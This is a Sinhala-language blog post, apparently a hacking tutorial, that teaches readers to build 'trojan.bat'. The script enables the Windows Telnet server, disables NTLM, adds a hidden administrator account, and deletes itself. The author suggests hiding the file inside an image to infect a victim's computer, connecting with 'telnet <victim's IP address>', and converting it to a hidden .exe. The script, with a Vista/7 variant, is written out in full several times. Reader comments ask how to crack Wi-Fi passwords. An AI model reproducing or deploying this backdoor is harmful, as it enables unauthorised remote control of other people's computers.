පරිගණක ජාලයකදී වෙනත් පරිගණකයක දත්ත ලබා ගැනීම වෙනුවෙන් බාවිතා කරන්න පුලුවන් ක්රමවේදයන් බොහොමයක් තියනවා. ඒ එක් එක් ක්රම වලදී යම් යම් අපහසුතාවයන් පැන නගින බව ප්රායෝගිකව බාවිතා කිරීමේදී ඔයාලට දැනෙනවා ඇති. ඉතින් ඩොස් හරහා ටෙල් නෙට් විදානය බාවිතා කරමින් වෙනත් පරිගණකයක දත්ත ලබා ගැනීමට හැකිද කියලා බලමු.
ටෙල් නෙට් විදානය බාවිත කරන්නේ පරිගණක ජාලයක සම්බන්දතාවයන් පරීක්ශා කිරීමට,වෙබ් අඩවි වල කේත කොටස පරික්ශා කිරීමට, අන්තර්ජාල මේල් සේවාවන් වලට. ඒ හරහා පරිගණකයේ පද්දති ක්රියාකාරකම් වලට බලපෑම් කිරීමේ හැකියාවක් පවතිනවා. අපි මුලින්ම කේත කොටසක් බාවිතා කරලා batch script එකක් ලියමු.
@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user Eranda/add
net user Eranda 12345
net localgroup administrators Eranda /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v Eranda/t REG_DWORD /d 00000000
del trojan.bat
ඉතින් මේ විදානයන් ටික නෝට්පෑඩ් එකක ලියගන්න.
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user Eranda/add
net user Eranda 12345
net localgroup administrators Eranda /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v Eranda/t REG_DWORD /d 00000000
del trojan.bat
ඉතින් මේ විදානයන් ටික නෝට්පෑඩ් එකක ලියගන්න.
ඊලගට මේ ගොනුව trojan.bat ආකාරයෙන් සුර්ක්ශිත කරගන්න.
ඉතින් අපි බලමු මේ කේත කොටසෙ මොනවද තියෙන්නෙ කියලා.
@echo off
sc config tlntsvr start=auto = පරිගණකය ආරම්බ කරන හැම අවස්තාවකදීම ඉබේම ක්රියාත්මක වන්න
sc start tlntsvr = windows NT system යටතේ ටෙල් නෙට් සේවාව ක්රියාත්මක කරන්න
tlntadmn config sec=-NTLM = NTLM hash security අක්රීය කරන්න
tlntadmn config mode=stream = අලුත් stream mode එකක් ටෙල් නෙට් තුලට ඇතුලත් කරන්න
net user Eranda/add = "Eranda" ලෙසින් නව පරිශීලක ගිණුමක් පරිගණකයට එක් කරන්න
net user Eranda 12345 = "Eranda" පරිශීලක ගිණුමේ මුරපදය ලෙස 12345 යොදන්න
net localgroup administrators Eranda/add = "Eranda" පරිශීලක ගිණුම ඇඩ්මිනිස්ට්රේටර් ගෘප් එකට එකතු කරන්න
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v Eranda/t REG_DWORD /d 00000000 = "Eranda" පරිශීලක ගිණුම සගවන්න
del trojan.bat = මේතෙක් වෙලා ක්රියාත්මක උන trojan.bat ගොනුව මකා දමන්න
හොදයි. දැන් ඔයාලට අවබෝද වෙන්න ඇති මේ කේත කොටසින් කියන්න මොකද්ද කියලා. අපිට උවමනා වන්නේ කිසියම් පරිශීලක නාමයක් පරිගණකයට එක් කරලා ඒ පරිශීලක නාමය ඒ පරිගණකයේ ඇඩ්මින් කෙනෙක් ලෙසින් සගවා තබන්න. ඉතින් ඉහල කේත කොටසින් එය නිවැරදිව කරලා දෙනවා. "Eranda" කියන එකට ඔයාලට කැමති නමක් බාවිත කරන්න පුලුවන්. 12345 වෙනුවටත් කැමති මුරපදයක් බාවිතා කරන්න පුලුවන්.
ඉතින් මේ කේත සටහන ක්රියාත්මක වන්නේ වින්ඩෝස් xp පරිගණක වල විතරයි. එයට හේතුව වන්නේ වින්ඩෝස් Vista සහ වින්ඩෝස් 7 වල ටෙල් නෙට් සේවාව ස්තාපිතව එන්නේ නැති නිසා. නමුත් අපි බෑ කියල නිකන් ඉදල බෑ නේද? ඉතින් වින්ඩෝස් 7 හරි වින්ඩෝස් Vista වලදී හරි අපිට හැකියාව තියනවා මේ ටෙල් නෙට් සේවාව ක්රියාත්මක කරවගෙනම මේ කේත කොටස ඒ මත ක්රියාත්මක කරවන්න. පහල කේත කොටස් බලන්න.
@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user Eranda/add
net user Eranda 12345
net localgroup administrators Eranda /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v Eranda /t REG_DWORD /d 00000000
ඉතින් මතක තියගන්න. මෙ කේත කොටස ක්රියාත්මක කරවන්න නම් ඔබ ඔබේ පරිගණකයේ ඇඩ්මින් ලෙසින් ලොග් වෙල ඉන්න ඕනේ. ඒ කියන්නේ ඔයාගේ පරිශීලක නාමය පවතින්නේ පරිගණකයේ User කෙනෙක් ලෙසින් නම් මේ කේත කොටස් ක්රියාත්මක වන්නේ නෑ. සුරක්ශිත කරගත් මේ trojan.bat ගොනුව අපිට දත්ත ලබාගන්න ඕනේ හෝ පාලනය කරන්න ඕනේ පරිගණකයේ ක්රියාත්මක කරවන්න ඕනේ. ඉතින් ඒකට එක් එක් ආකාරයේ ක්රමවේදයන් මං කලින් පෝස්ට් වල කියලා දුන්නා. එකක් තමයි මේ ගොනුව ඉමේජ් එකක් තුල හංගලා අදාල පරිගනකයට යවන්න පුලුවන්. ඉතින් කෙසේ හෝ මේ කේත් කොටස අදාල පරිගණකයේ ක්රියාත්මක් උනාට පස්සේ අපිට හැකියාව තියනවා අපේ පරිගණකයේ සිට ටෙල්නෙට් විදානය බාවිතා කර අදාල පරිගණකය වෙත රිංගන්න
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user Eranda/add
net user Eranda 12345
net localgroup administrators Eranda /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v Eranda /t REG_DWORD /d 00000000
ඉතින් මතක තියගන්න. මෙ කේත කොටස ක්රියාත්මක කරවන්න නම් ඔබ ඔබේ පරිගණකයේ ඇඩ්මින් ලෙසින් ලොග් වෙල ඉන්න ඕනේ. ඒ කියන්නේ ඔයාගේ පරිශීලක නාමය පවතින්නේ පරිගණකයේ User කෙනෙක් ලෙසින් නම් මේ කේත කොටස් ක්රියාත්මක වන්නේ නෑ. සුරක්ශිත කරගත් මේ trojan.bat ගොනුව අපිට දත්ත ලබාගන්න ඕනේ හෝ පාලනය කරන්න ඕනේ පරිගණකයේ ක්රියාත්මක කරවන්න ඕනේ. ඉතින් ඒකට එක් එක් ආකාරයේ ක්රමවේදයන් මං කලින් පෝස්ට් වල කියලා දුන්නා. එකක් තමයි මේ ගොනුව ඉමේජ් එකක් තුල හංගලා අදාල පරිගනකයට යවන්න පුලුවන්. ඉතින් කෙසේ හෝ මේ කේත් කොටස අදාල පරිගණකයේ ක්රියාත්මක් උනාට පස්සේ අපිට හැකියාව තියනවා අපේ පරිගණකයේ සිට ටෙල්නෙට් විදානය බාවිතා කර අදාල පරිගණකය වෙත රිංගන්න
C:\>telnet <victim's IP address>
ඉතින් මේ කේත කොටස ඉතාමත් සරල කේත කොටසක්. මට උවමන උනේ කොහොමද ට්රොජන් ආකාරයේ වයිරසයක් ක්රියාත්මක වන්නෙ කියන එක ඔයාලට කියලා දෙන්න. ට්රොජන් කාන්ඩයේ වයිරස් බොහොමයක් ටෙල්නෙට් පහසුකම් බාවිතා කරමින් පරිගණක අතර පැතිරෙනවා. ඉතින් බොහොමයක් ජාල වල මේ ටෙල්නෙට් පෝට් එක වහලා තියෙන්නේ ඒ නිසයි. මං දැකලා තියනවා සමහර පරිගණක වල ටෙල්නෙට් සර්විස් එකම නවත්තලා තියනවා. ඒ තරම් මෙය බයානක පෝට් එකක්.
ඉතින් මේ කේතයේ පොඩි ප්රශ්ණයක් තියනවා. ඒ තමයි පරිගණකය ක්රියාත්මක වන මුල් අවස්තාවේදී පොපප් එකක් ලෙසින් පැන නැගී ක්ශණිකව නැති වෙල යාම. එයට හේතුව මෙය ක්රියාත්මක වන්නේ ඩොස් මත නිසයි. ඉතින් එය වලක්වන්න මේ .bat ගොනුව .exe එකක් බවට පත් කරගන්න. එහෙම කරගන්න් පුලුවන් මෘදුකාංග ඕනේ තරම් අන්තර්ජාලයේ තියනවා. Hidden Bat2EXE කියන්නේ ඒ වගේ මෘදුකාංගයක්. එය පහල ලින්කුවෙන් බාගත කරගන්න පුලුවන්.
ඉතින් මේ කේත කොටස් ලියද්දි හිස් ඉඩක් ගැන උනත් සැලකිලිමත් වන්න. නිසි ආකාරයෙන් නොලිවුන කෝත කොටසක් ක්රියාත්මක නොවන්න තියන ඉඩකඩ වැඩි.. සුබ දවසක්...!
About the authorEranda Dayawansa
5 comments:
මේකනම් මාරු මචන්
mchn, mata kiyala denna pluwanda onema Wi-Fi network ekaka password hoyaganna pluwan widiha gana...
thankx
aiya oya kalin kiya dipu eke port 139 ewa hoya ganna behene. wena widihak nedda
oyage download link weda ne aiyaa. good luck
machan telnet gahuwama login screen ekak enawa.ekedi mama trojan eken hadapu log in details dammata log wenne na.anith eka windows 7 walata dila tiyena script eka wada karanne nane.
Post a Comment